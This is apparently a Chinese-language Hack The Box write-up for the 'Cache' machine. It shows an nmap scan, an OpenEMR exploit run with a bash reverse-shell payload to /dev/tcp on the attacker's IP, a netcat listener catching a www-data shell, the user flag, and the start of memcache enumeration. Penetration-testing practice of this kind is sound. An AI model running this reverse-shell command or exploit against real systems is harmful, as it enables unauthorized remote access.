# Nmap 7.80 scan initiated Sun Aug 9 12:47:22 2020 as: nmap -sC -sV -oN nmap/initial 10.10.10.188 Nmap scan report for 10.10.10.188 Host is up (0.29s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 a9:2d:b2:a0:c4:57:e7:7c:35:2d:45:4d:db:80:8c:f1 (RSA) | 256 bc:e4:16:3d:2a:59:a1:3a:6a:09:28:dd:36:10:38:08 (ECDSA) |_ 256 57:d5:47:ee:07:ca:3a:c0:fd:9b:a8:7f:6b:4c:9d:7c (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Cache Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sun Aug 9 12:49:26 2020 -- 1 IP address (1 host up) scanned in 123.77 seconds
┌─[matt@parrot]─[~/Documents/HTB/Boxes/Cache] └──╼ $python poc.py http://hms.htb -u openemr_admin -p xxxxxx -c 'bash -i >& /dev/tcp/10.10.16.8/1337 0>&1' .---. ,---. ,---. .-. .-.,---. ,---. / .-. ) | .-.\ | .-' | \| || .-' |\ /|| .-.\ | | |(_)| |-' )| `-. | | || `-. |(\ / || `-'/ | | | | | |--' | .-' | |\ || .-' (_)\/ || ( \ `-' / | | | `--.| | |)|| `--.| \ / || |\ \ )---' /( /( __.'/( (_)/( __.'| |\/| ||_| \)\ (_) (__) (__) (__) (__) '-' '-' (__) ={ P R O J E C T I N S E C U R I T Y }= Twitter : @Insecurity Site : insecurity.sh [$] Authenticating with openemr_admin:xxxxxx [$] Injecting payload
1 2 3 4 5 6 7 8 9 10 11 12
┌─[matt@parrot]─[~/Documents/HTB/Boxes/Cache] └──╼ $nc -nlvp 1337 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::1337 Ncat: Listening on 0.0.0.0:1337 Ncat: Connection from 10.10.10.188. Ncat: Connection from 10.10.10.188:35164. bash: cannot set terminal process group (2020): Inappropriate ioctl for device bash: no job control in this shell www-data@cache:/var/www/hms.htb/public_html/interface/main$ id id uid=33(www-data) gid=33(www-data) groups=33(www-data)
拿到Shell后使用之前在源代码中获取的密码,能够切换至用户ash。
1 2 3 4 5
www-data@cache:/home$ su - ash Password: ash@cache:~$ cd ash@cache:~$ cat user.txt d3a9cb94055ba6e0087aec05b250b271
Root.txt
Memcache
查看本地端口,靶机监听了11211端口,查看该端口进程,确认该端口为Memcache使用
1 2 3 4 5 6 7 8 9 10 11
ash@cache:/dev/shm$ netstat -anutp | grep 127.0.0.1 (Not all processes could be identified, non-owned process info will not be shown, you would have to be root to see it all.) tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:11211 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:55136 127.0.0.1:11211 TIME_WAIT - tcp 0 0 127.0.0.1:55168 127.0.0.1:11211 TIME_WAIT - udp 0 0 127.0.0.1:41070 127.0.0.53:53 ESTABLISHED - ash@cache:/dev/shm$ ps -ef | grep 11211 memcache 943 1 0 Aug08 ? 00:00:24 /usr/bin/memcached -m 64 -p 11211 -u memcache -l 127.0.0.1 -P /var/run/memcached/memcached.pid ash 20763 17528 0 07:32 pts/0 00:00:00 grep --color=auto 1121